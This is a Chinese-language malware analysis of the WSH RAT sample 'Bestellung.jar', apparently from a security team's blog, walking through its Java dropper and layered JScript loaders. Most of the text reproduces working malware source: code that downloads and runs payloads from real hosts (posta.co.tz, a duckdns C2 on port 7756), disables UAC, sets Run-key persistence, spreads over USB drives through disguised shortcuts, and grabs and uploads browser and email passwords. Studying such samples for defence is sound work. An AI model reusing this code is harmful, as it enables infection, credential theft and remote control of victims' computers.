WSA RAT是2019年6月发布得一款新型RAT恶意软件,基于Java,wscript,具有盗取受害者敏感信息,控制计算机,上传下载文件以及执行特定命令等恶意行为。
样本信息
样本名称:Bestellung.jar
样本md5:95014878404D850502BA546A0FEB3CFC
来源:app.any.run
分析过程
jadx打开,得到主函数
package dcrioymvqp;
import java.io.ByteArrayOutputStream;
import java.io.File;
public class Melrjerltjy {
public static void main(String[] strArr) {
try {
Mgpmluovxer mgpmluovxer = new Mgpmluovxer(new File(System.getProperty("user.home") + File.separator + "lrefocyhfz.js"));
mgpmluovxer.USA[1] = Melrjerltjy.class.getResourceAsStream("resources/ycfysuwhlz");
for (int i = 0; i < mgpmluovxer.bringStrVal(new ByteArrayOutputStream()); i++) {
System.out.println("Hello world");
}
((Runtime) mgpmluovxer.USA[1]).exec(new String[]{"wscript", (String) mgpmluovxer.USA[0]});
} catch (Exception e) {
e.printStackTrace();
}
}
}
首先初始化了Mgpmluovxer对象,然后从释放恶意js脚本,最后使用wscript执行释放的脚本
接下来查看Mgpmluovxer类
package dcrioymvqp;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;
/* compiled from: Melrjerltjy */
class Mgpmluovxer {
public Object[] USA;
private int i = 0;
// 构造函数只是初始化了一个对象数组
Mgpmluovxer(File file) {
this.USA = new Object[]{file, null};
}
private Object[] rRead(InputStream inputStream) throws Exception {
byte[] bArr = new byte[1024];
return new Object[]{Integer.valueOf(inputStream.read(bArr, 0, bArr.length)), bArr};
}
private void tacha() throws Exception {
FileOutputStream fileOutputStream = new FileOutputStream((File) this.USA[0]);
fileOutputStream.write((byte[]) this.USA[1]);
fileOutputStream.flush();
fileOutputStream.close();
this.USA[0] = ((File) this.USA[0]).getAbsolutePath();
this.USA[1] = Runtime.getRuntime();
this.i = 2;
}
public int bringStrVal(ByteArrayOutputStream byteArrayOutputStream) throws Exception {
if (this.i == 0) {
InputStream inputStream = (InputStream) this.USA[1];
while (true) {
Object[] rRead = rRead(inputStream);
if (((Integer) rRead[0]).intValue() == -1) {
inputStream.close();
this.USA[1] = byteArrayOutputStream.toByteArray();
this.i = 1;
return 2;
}
byteArrayOutputStream.write((byte[]) rRead[1], 0, ((Integer) rRead[0]).intValue());
}
} else if (this.i != 1) {
return 2;
} else {
tacha();
return 2;
}
}
}
构造函数只是初始化了一个Object数组,但是另一个对象是main函数中赋值的,是资源文件。
bringStrVal首先把字符串转化程数字,以判断是否结尾。再把数字转换为字符串,写入数组
使用自身的i属性控制程序流程,读取脚本之后写入到USA[0]指向文件内,并将USA[1]转化为Java运行时虚拟机。根据主函数分析,目标文件为home文件夹下地refocyhfz.js
refocyhfz.js分析
var obaAdedapo = ["d#!%FyIGxvb#!%dUZXh0MSA9ICJkbUZ5S...Cn0=", "bin.base64"];
function tsnkaDE(noSign){
noSign.O[0].dataType = obaAdedapo[1];
noSign.O[0].text = obaAdedapo[0].replace(noSign.I, "m");
return Array(function(){return noSign.O;});
}
var ume22 = Array(function(txt){
return WSH.CreateObject(txt);
});
function kubernetes(){
try{
return ume22[0]("Loki.Happy.Birthday");
}catch(er){
return null;
}
}
function faulty(modELN0, modELN1, modELN2){
return Array(modELN0[0].getString((modELN0[1])), modELN2);
}
//
function jiePAmE(modELN, modELN1, modELN2){
try{
var ntv = tsnkaDE({O: Array(modELN1[0].createElement("pay")), I: new RegExp(modELN[0], modELN[1])});
if(kubernetes() == null){
var sBABi = ume22[0]("Adodb.Stream");
sBABi.Type = 1;
sBABi.Open();
sBABi.Write(ntv[0]()[0].nodeTypedValue);
sBABi.Position = 0;
sBABi.Type = (3-1);
sBABi.CharSet = "us-ascii";
modELN = Array(sBABi.ReadText(), eval);
ntv = null;
}else{
ntv = faulty([kubernetes(), ntv.item().nodeTypedValue], null, eval);
}
modELN2 = ntv.Read();
}catch(err){
modELN[1]({j:[modELN[0]]}.j[0]);
}
}
jiePAmE(Array("#!%", "g"), Array(ume22[0]("Microsoft.XmlDom")));
首先把obaAdedapo中地#!%都替换为m,然后使用base64解密。解密后是一个脚本。
由于不存在Loki.Happy.Birthday类,所以执行第一个if内的语句,但是ntv是null,执行catch中的语句,catch中实际上调用了eval函数,即实现了执行脚本
接下来分析exec的代码
var longText1="...";
var wshShell1 = WScript.CreateObject("WScript.Shell");
var appdatadir1 = wshShell1.ExpandEnvironmentStrings("%appdata%");
var stubpath1 = appdatadir1 + "\hliqmPFawG.js";
var decoded1 = decodeBase64(longText1);
writeBytes(stubpath1, decoded1);
wshShell1.run(""" + stubpath1 + """);
wshShell1 = null;
var longText="...";
var re = new RegExp("#!%", "g");
longText = longText.replace(re, "A");
var wshShell = WScript.CreateObject("WScript.Shell");
var tempdir = wshShell.ExpandEnvironmentStrings("%temp%");
var appdatadir = wshShell.ExpandEnvironmentStrings("%appdata%");
var r = Math.random().toString(36).replace(/[^a-z]+/g, '').substr(0, 10);
var stubpath = appdatadir + "\" + r + ".txt"
var decoded = decodeBase64(longText);
writeBytes(stubpath, decoded);
var fso = WScript.CreateObject("Scripting.FileSystemObject");
var text = "";
try {
text = wshShell.RegRead("HKLM\SOFTWARE\Wow6432Node\JavaSoft\Java Runtime Environment\CurrentVersion");
text = wshShell.RegRead("HKLM\SOFTWARE\Wow6432Node\JavaSoft\Java Runtime Environment\" + text + "\JavaHome");
} catch (err) {}
try {
if (text == "") {
text = wshShell.RegRead("HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\CurrentVersion");
text = wshShell.RegRead("HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\" + text + "\JavaHome");
if (text != "") {
text = text + "\bin\javaw.exe";
}
} else {
text = text + "\bin\javaw.exe";
}
} catch (err) {}
try {
if (text != "") {
//wshShell.RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ntfsmgr", """ + text + "" -jar "" + stubpath + """, "REG_SZ");
wshShell.run(""" + text + """ + " -jar " + """ + stubpath + """);
} else {
GrabJreFromNet();
}
} catch (err) {}
function GrabJreFromNet() {
do {
try {
var xHttp = WScript.CreateObject("Microsoft.XMLHTTP");
var bStrm = WScript.CreateObject("Adodb.Stream");
xHttp.open("GET", "https://posta.co.tz/goz/jre7.zip", false);
xHttp.send();
bStrm.Type = 1;
bStrm.open();
bStrm.write(xHttp.responseBody);
bStrm.savetofile() + "\jre.zip", 2);
break;
} catch (err) {
WScript.Sleep(5000);
}
} while (true);
UnZip(appdatadir + "\jre.zip", appdatadir + "\jre7");
wshShell.RegWrite("HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\CurrentVersion", "1.8", "REG_SZ");
wshShell.RegWrite("HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\1.8\JavaHome", appdatadir + "\jre7", "REG_SZ");
wshShell.RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ntfsmgr", """ + appdatadir + "\jre7\bin\javaw.exe" -jar " + """ + stubpath & """, "REG_SZ");
wshShell.run(""" + appdatadir + "\jre7\bin\javaw.exe" -jar " + """ + stubpath + """);
}
function decodeBase64(base64) {
var DM = WScript.CreateObject("Microsoft.XMLDOM");
var EL = DM.createElement("tmp");
EL.dataType = "bin.base64";
EL.text = base64;
return EL.nodeTypedValue;
}
function writeBytes(file, bytes) {
var binaryStream = WScript.CreateObject("ADODB.Stream");
binaryStream.Type = 1;
binaryStream.Open();
binaryStream.Write(bytes);
binaryStream.SaveToFile(file, 2);
}
function UnZip(zipfile, ExtractTo) {
if (fso.GetExtensionName(zipfile) == "zip") {
if (!fso.FolderExists(ExtractTo)) {
fso.CreateFolder(ExtractTo);
}
var objShell = WScript.CreateObject("Shell.Application");
var destination = objShell.NameSpace(ExtractTo);
var zip_content = objShell.NameSpace(zipfile).Items();
for (i = 0; i < zip_content.Count; i++) {
if (fso.FileExists(fso.Buildpath(ExtractTo, zip_content.item(i).name) + "." + fso.getExtensionName(zip_content.item(i).path))) {
fso.DeleteFile(fso.Buildpath(ExtractTo, zip_content.item(i).name) + "." + fso.getExtensionName(zip_content.item(i).path));
}
destination.copyHere(zip_content.item(i), 20);
}
}
}
先解密一个base64串,然后保存为hliqmPFawG.js,执行里面的js脚本。然后使用java执行脚本
先解码了longText,然后从注册表中读取Java的路径。32位和64位均支持,如果没有Java路径,则会从https://posta.co.tz/goz/jre7.zip 下载jre7到appdata目录并解压。最后执行base64串包含的jar文件。
其中,hliqmPFawG.js和refocyhfz.js类似,都是一个加载器,逻辑类似。其解密和执行的js脚本如下
//<[ recoder : kognito (c) skype : live:unknown.sales64 ]>
//=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
var host = "pluginsrv1.duckdns.org";
var port = 7756;
var installdir = "%appdata%";
var runAsAdmin = false;
var lnkfile = true;
var lnkfolder = true;
if (runAsAdmin == true) {
startupElevate();
}
if (WScript.Arguments.Named.Exists("elevated") == true) {
disableSecurity();
}
//=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
var shellobj = WScript.createObject("wscript.shell");
var filesystemobj = WScript.createObject("scripting.filesystemobject");
var httpobj = WScript.createObject("msxml2.xmlhttp");
//=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
var installname = WScript.scriptName;
var startup = shellobj.specialFolders("startup") + "\";
installdir = shellobj.ExpandEnvironmentStrings(installdir) + "\";
if (!filesystemobj.folderExists(installdir)) {
installdir = shellobj.ExpandEnvironmentStrings("%temp%") + "\";
}
var spliter = "|";
var sdkpath = installdir + "wshsdk";
var sdkfile = sdkpath + "\" + chr(112) + chr(121) + chr(116) + chr(104) + chr(111) + chr(110) + chr(46) + chr(101) + chr(120) + chr(101);
var sleep = 5000;
var response, cmd, param, oneonce;
var inf = "";
var usbspreading = "";
var startdate = "";
//=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
instance();
while (true) {
try {
install();
response = "";
response = post("is-ready", "");
cmd = response.split(spliter);
switch (cmd[0]) {
case "disconnect":
WScript.quit();
break;
// 一系列控制指令
}
} catch (er) {}
WScript.sleep(sleep);
}
function installsdk() {
try {
var sdkurl = post("moz-sdk", "");
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
objhttpdownload.open("get", sdkurl, false);
objhttpdownload.setRequestHeader("cache-control:", "max-age=0");
objhttpdownload.send();
if (filesystemobj.fileExists(installdir + "wshsdk.zip")) {
filesystemobj.deleteFile(installdir + "wshsdk.zip");
}
if (objhttpdownload.status == 200) {
try {
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.SaveToFile(installdir + "wshsdk.zip");
objstreamdownload.close();
objstreamdownload = null;
} catch (ez) {
}
}
if (filesystemobj.fileExists(installdir + "wshsdk.zip")) {
//unzip the file
UnZip(installdir + "wshsdk.zip", sdkpath);
updatestatus("SDK+Installed");
}
} catch (err) {}
}
function install() {
var lnkobj;
var filename;
var foldername;
var fileicon;
var foldericon;
upstart();
for (var dri = new Enumerator(filesystemobj.drives); !dri.atEnd(); dri.moveNext()) {
var drive = dri.item();
if (drive.isready == true) {
if (drive.freespace > 0) {
if (drive.drivetype == 1) {
try {
filesystemobj.copyFile(WScript.scriptFullName, drive.path + "\" + installname, true);
if (filesystemobj.fileExists(drive.path + "\" + installname)) {
filesystemobj.getFile(drive.path + "\" + installname).attributes = 2 + 4;
}
} catch (eiju) {}
for (var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\").files); !fi.atEnd(); fi.moveNext()) {
try {
var file = fi.item();
if (lnkfile == false) {
break;
}
if (file.name.indexOf(".")) {
if ((file.name.split(".")[file.name.split(".").length - 1]).toLowerCase() != "lnk") {
file.attributes = 2 + 4;
if (file.name.toUpperCase() != installname.toUpperCase()) {
filename = file.name.split(".");
lnkobj = shellobj.createShortcut(drive.path + "\" + filename[0] + ".lnk");
lnkobj.windowStyle = 7;
lnkobj.targetPath = "cmd.exe";
lnkobj.workingDirectory = "";
lnkobj.arguments = "/c start " + installname.replace(new RegExp(" ", "g"), "" "") + "&start " + file.name.replace(new RegExp(" ", "g"), "" "") + "&exit";
try {
fileicon = shellobj.RegRead("HKEY_LOCAL_MACHINE\software\classes\" + shellobj.RegRead("HKEY_LOCAL_MACHINE\software\classes\." + file.name.split(".")[file.name.split(".").length - 1] + "\") + "\defaulticon\");
} catch (eeee) {}
if (fileicon.indexOf(",") == 0) {
lnkobj.iconLocation = file.path;
} else {
lnkobj.iconLocation = fileicon;
}
lnkobj.save();
}
}
}
} catch (err) {}
}
for (var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\").subFolders); !fi.atEnd(); fi.moveNext()) {
try {
var folder = fi.item();
if (lnkfolder == false) {
break;
}
folder.attributes = 2 + 4;
foldername = folder.name;
lnkobj = shellobj.createShortcut(drive.path + "\" + foldername + ".lnk");
lnkobj.windowStyle = 7;
lnkobj.targetPath = "cmd.exe";
lnkobj.workingDirectory = "";
lnkobj.arguments = "/c start " + installname.replace(new RegExp(" ", "g"), "" "") + "&start explorer " + folder.name.replace(new RegExp(" ", "g"), "" "") + "&exit";
foldericon = shellobj.RegRead("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\");
if (foldericon.indexOf(",") == 0) {
lnkobj.iconLocation = folder.path;
} else {
lnkobj.iconLocation = foldericon;
}
lnkobj.save();
} catch (err) {}
}
}
}
}
}
}
function startupElevate() {
if (WScript.Arguments.Named.Exists("elevated") == false) {
try {
WScript.CreateObject("Shell.Application").ShellExecute("wscript.exe", " //B "" + WScript.ScriptFullName + "" /elevated", "", "runas", 1);
} catch (nn) {}
WScript.quit();
}
}
function disableSecurity() {
if (WScript.Arguments.Named.Exists("elevated") == true) {
var oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv");
oReg.SetDwordValue(0x80000002, "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", 0);
oReg.SetDwordValue(0x80000002, "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "ConsentPromptBehaviorAdmin", 0);
oReg = null;
}
}
function uninstall() {
try {
var filename;
var foldername;
try {
shellobj.RegDelete("HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" + installname.split(".")[0]);
shellobj.RegDelete("HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" + installname.split(".")[0]);
} catch (ei) {}
try {
filesystemobj.deleteFile(startup + installname, true);
filesystemobj.deleteFile(WScript.scriptFullName, true);
} catch (eej) {}
for (var dri = new Enumerator(filesystemobj.drives); !dri.atEnd(); dri.moveNext()) {
var drive = dri.item();
if (drive.isready == true) {
if (drive.freespace > 0) {
if (drive.drivetype == 1) {
for (var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\").files); !fi.atEnd(); fi.moveNext()) {
var file = fi.item();
try {
if (file.name.indexOf(".")) {
if ((file.name.split(".")[file.name.split(".").length - 1]).toLowerCase() != "lnk") {
file.attributes = 0;
if (file.name.toUpperCase() != installname.toUpperCase()) {
filename = file.name.split(".");
filesystemobj.deleteFile(drive.path + "\" + filename[0] + ".lnk");
} else {
filesystemobj.deleteFile(drive.path + "\" + file.name);
}
} else {
filesystemobj.deleteFile(file.path);
}
}
} catch (ex) {}
}
for (var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\").subFolders); !fi.atEnd(); fi.moveNext()) {
var folder = fi.item();
folder.attributes = 0;
}
}
}
}
}
} catch (err) {}
WScript.quit();
}
function post(cmd, param) {
try {
httpobj.open("post", "http://" + host + ":" + port + "/" + cmd, false);
httpobj.setRequestHeader("user-agent:", information());
httpobj.send(param);
return httpobj.responseText;
} catch (err) {
return "";
}
}
function information() {
try {
if (inf == "") {
inf = hwid() + spliter;
inf = inf + shellobj.ExpandEnvironmentStrings("%computername%") + spliter;
inf = inf + shellobj.ExpandEnvironmentStrings("%username%") + spliter;
var root = GetObject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2");
var os = root.ExecQuery("select * from win32_operatingsystem");
for (var fi = new Enumerator(os); !fi.atEnd(); fi.moveNext()) {
var osinfo = fi.item();
inf = inf + osinfo.caption + spliter;
break;
}
inf = inf + "plus" + spliter;
inf = inf + security() + spliter;
inf = inf + usbspreading;
inf = "WSHRAT" + spliter + inf + spliter + "JavaScript-v1.6";
return inf;
} else {
return inf;
}
} catch (err) {
return "";
}
}
function upstart() {
try {
try {
shellobj.RegWrite("HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" + installname.split(".")[0], "wscript.exe //B "" + installdir + installname + """, "REG_SZ");
shellobj.RegWrite("HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" + installname.split(".")[0], "wscript.exe //B "" + installdir + installname + """, "REG_SZ");
} catch (ei) {}
filesystemobj.copyFile(WScript.scriptFullName, installdir + installname, true);
filesystemobj.copyFile(WScript.scriptFullName, startup + installname, true);
} catch (err) {}
}
function hwid() {
// 获取硬件ID
}
function security() {
try {
var objwmiservice = GetObject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2");
var colitems = objwmiservice.ExecQuery("select * from win32_operatingsystem", null, 48);
var versionstr, osversion;
for (var fi = new Enumerator(colitems); !fi.atEnd(); fi.moveNext()) {
var objitem = fi.item();
versionstr = objitem.version.toString().split(".");
}
//versionstr = colitems.version.split(".");
osversion = versionstr[0] + ".";
for (var x = 1; x < versionstr.length; x++) {
osversion = osversion + versionstr[0];
}
osversion = eval(osversion);
var sc;
if (osversion > 6) {
sc = "securitycenter2";
} else {
sc = "securitycenter";
}
var objsecuritycenter = GetObject("winmgmts:\\localhost\root\" + sc);
var colantivirus = objsecuritycenter.ExecQuery("select * from antivirusproduct", "wql", 0);
var secu = "";
for (var fi = new Enumerator(colantivirus); !fi.atEnd(); fi.moveNext()) {
var objantivirus = fi.item();
secu = secu + objantivirus.displayName + " .";
}
if (secu == "") {
secu = "nan-av";
}
return secu;
} catch (err) {}
}
function getDate() {
// 获取日期
}
function instance() {
try {
try {
usbspreading = shellobj.RegRead("HKEY_LOCAL_MACHINE\software\" + installname.split(".")[0] + "\");
} catch (eee) {}
if (usbspreading == "") {
if (WScript.scriptFullName.substr(1).toLowerCase() == ":\" + installname.toLowerCase()) {
usbspreading = "true - " + getDate();
try {
shellobj.RegWrite("HKEY_LOCAL_MACHINE\software\" + installname.split(".")[0] + "\", usbspreading, "REG_SZ");
} catch (eeeee) {}
} else {
usbspreading = "false - " + getDate();
try {
shellobj.RegWrite("HKEY_LOCAL_MACHINE\software\" + installname.split(".")[0] + "\", usbspreading, "REG_SZ");
} catch (eeeee) {}
}
}
upstart();
var scriptfullnameshort = filesystemobj.getFile(WScript.scriptFullName);
var installfullnameshort = filesystemobj.getFile(installdir + installname);
if (scriptfullnameshort.shortPath.toLowerCase() != installfullnameshort.shortPath.toLowerCase()) {
shellobj.run("wscript.exe //B "" + installdir + installname + """);
WScript.quit();
}
oneonce = filesystemobj.openTextFile(installdir + installname, 8, false);
} catch (err) {
WScript.quit();
}
}
function decode_base64(base64_string) {
// ...
}
function decode_pass(retcmd) {
//...
}
function chr(code) {
return String.fromCharCode(code);
}
function gsp(path) {
return filesystemobj.getFile(path).shortPath;
}
function passgrabber(fileurl, filename, retcmd) {
// 获取IE,Chrome,Firefox等浏览器的密码
}
function UnZip(zipfile, ExtractTo) {
// 解压
}
function passgrabber2(fileurl, filename, retcmd) {
shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
try {
filesystemobj.deleteFile(installdir + filename + "data");
} catch (ey) {}
var config_file = installdir + filename.substr(0, filename.lastIndexOf(".")) + ".cfg";
var cfg = "[General]nShowGridLines=0nSaveFilterIndex=0nShowInfoTip=1nUseProfileFolder=0nProfileFolder=nMarkOddEvenRows=0nWinPos=2C 00 00 00 00 00 00 00 01 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 00 00 00 00 00 00 00 80 02 00 00 E0 01 00 00nColumns=FA 00 00 00 FA 00 01 00 6E 00 02 00 6E 00 03 00 78 00 04 00 78 00 05 00 78 00 06 00 64 00 07 00 FA 00 08 00nSort=0";
//write config
var writer = filesystemobj.openTextFile(config_file, 2, true);
writer.writeLine(cfg);
writer.close();
writer = null;
var strlink = fileurl;
var strsaveto = installdir + filename;
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
objhttpdownload.open("get", strlink, false);
objhttpdownload.setRequestHeader("cache-control:", "max-age=0");
objhttpdownload.send();
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if (objfsodownload.fileExists(strsaveto)) {
objfsodownload.deleteFile(strsaveto);
}
if (objhttpdownload.status == 200) {
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload = null;
}
if (objfsodownload.fileExists(strsaveto)) {
var runner = WScript.CreateObject("Shell.Application");
var saver = objfsodownload.getFile(strsaveto).shortPath
//try 10 times before giveup
for (var i = 0; i < 5; i++) {
shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
WScript.sleep(1000);
runner.shellExecute(saver, " /stext " + saver + "data");
WScript.sleep(2000);
if (objfsodownload.fileExists(saver + "data")) {
var sr = filesystemobj.openTextFile(saver + "data");
var buffer = sr.readall();
sr.close();
sr = null;
var outpath = installdir + "wshlogs\recovered_password_email.log";
var folder = objfsodownload.GetParentFolderName(outpath);
if (!objfsodownload.FolderExists(folder)) {
shellobj.run("%comspec% /c mkdir "" + folder + """, 0, true);
}
writer = filesystemobj.openTextFile(outpath, 2, true);
writer.write(buffer);
writer.close();
writer = null;
upload(saver + "data", retcmd);
break;
}
}
deletefaf(strsaveto);
}
}
function keyloggerstarter(fileurl, filename, filearg, is_offline) {
// 记录键盘
}
function servicestarter(fileurl, filename, filearg) {
shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
var strlink = fileurl;
var strsaveto = installdir + filename;
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
objhttpdownload.open("get", strlink, false);
objhttpdownload.setRequestHeader("cache-control:", "max-age=0");
objhttpdownload.send();
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if (objfsodownload.fileExists(strsaveto)) {
objfsodownload.deleteFile(strsaveto);
}
if (objhttpdownload.status == 200) {
try {
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload = null;
} catch (err) {
updatestatus("Access+Denied");
}
}
if (objfsodownload.fileExists(strsaveto)) {
shellobj.run(""" + strsaveto + "" " + host + " " + port + " "" + filearg + """);
}
}
function sitedownloader(fileurl, filename) {
var strlink = fileurl;
var strsaveto = installdir + filename;
var objhttpdownload = WScript.CreateObject("msxml2.serverxmlhttp");
objhttpdownload.open("get", strlink, false);
objhttpdownload.setRequestHeader("cache-control", "max-age=0");
objhttpdownload.send();
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if (objfsodownload.fileExists(strsaveto)) {
objfsodownload.deleteFile(strsaveto);
}
if (objhttpdownload.status == 200) {
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload = null;
}
if (objfsodownload.fileExists(strsaveto)) {
shellobj.run(objfsodownload.getFile(strsaveto).shortPath);
updatestatus("Executed+File");
}
}
function download(fileurl, filedir) {
// 下载文件
}
function updatestatus(status_msg) {
try {
var objsoc = WScript.CreateObject("msxml2.xmlhttp");
objsoc.open("post", "http://" + host + ":" + port + "/" + "update-status" + spliter + status_msg, false);
objsoc.setRequestHeader("user-agent:", information());
objsoc.send("");
} catch (err) {}
}
function upload(fileurl, retcmd) {
// 上传文件
}
function deletefaf(url) {
try {
filesystemobj.deleteFile(url);
filesystemobj.deleteFolder(url);
} catch (err) {}
}
function cmdshell(cmd) {
// 执行命令并返回命令
return readallfromany;
}
function enumprocess() {
// 穷举所有进程pid以及进程名,路径等
return ep;
}
function exitprocess(pid) {
// 退出
}
function getParentDirectory(path) {
var fo = filesystemobj.getFile(path);
return filesystemobj.getParentFolderName(fo);
}
function enumfaf(enumdir) {
var re = "";
try {
for (var fi = new Enumerator(filesystemobj.getFolder(enumdir).subfolders); !fi.atEnd(); fi.moveNext()) {
var folder = fi.item();
re = re + folder.name + "^^d^" + folder.attributes + spliter;
}
for (var fi = new Enumerator(filesystemobj.getFolder(enumdir).files); !fi.atEnd(); fi.moveNext()) {
var file = fi.item();
re = re + file.name + "^" + file.size + "^" + file.attributes + spliter;
}
} catch (err) {}
return re;
}
可以看到这个脚本首先会尝试提权,然后从pluginsrv1.duckdns.org:7756读取命令,可以执行计算机命令。并且会安装SDK,设置该脚本为开机自动启动
jar文件分析
根据清单文件,会先执行operational.Jrat类中的main函数,该函数实际执行了iiiiiiiiii.class。如果执行该class失败,则会重复尝试
iiiiiiiiii.class实际上是一个jar包,微步云沙箱检测结果如下
经过粗略分析,该类包括解密脚本,写入件,执行脚本等恶意行为。
总结
该程序包含多次脚本解密,脚本混淆,给分析带来极大困难。“套娃”式地将攻击脚本隐藏得非常深。主要使用wscript执行,同时包含一些java代码。
防范方法
APT报告中提到该程序主要通过钓鱼邮件传播,而钓鱼邮件一般都是包含了特定得社会工程因素。提醒计算机使用者,一定要找到官方链接点击,千万不要执行来源不明的程序,点击来源不明的链接。该病毒已经被各杀软平台识别,所以计算机一定要安装杀毒软件。
参考链接
-
黑客购买新型WSH RAT最新变种样本,攻击银行客户–FreeBuf -
WScript–百度百科 -
ADO Stream Object–w3school -
微步云沙箱 -
app.any.run分析报告
end
招新小广告
ChaMd5 Venom 招收大佬入圈
新成立组IOT+工控+样本分析+AI 长期招新
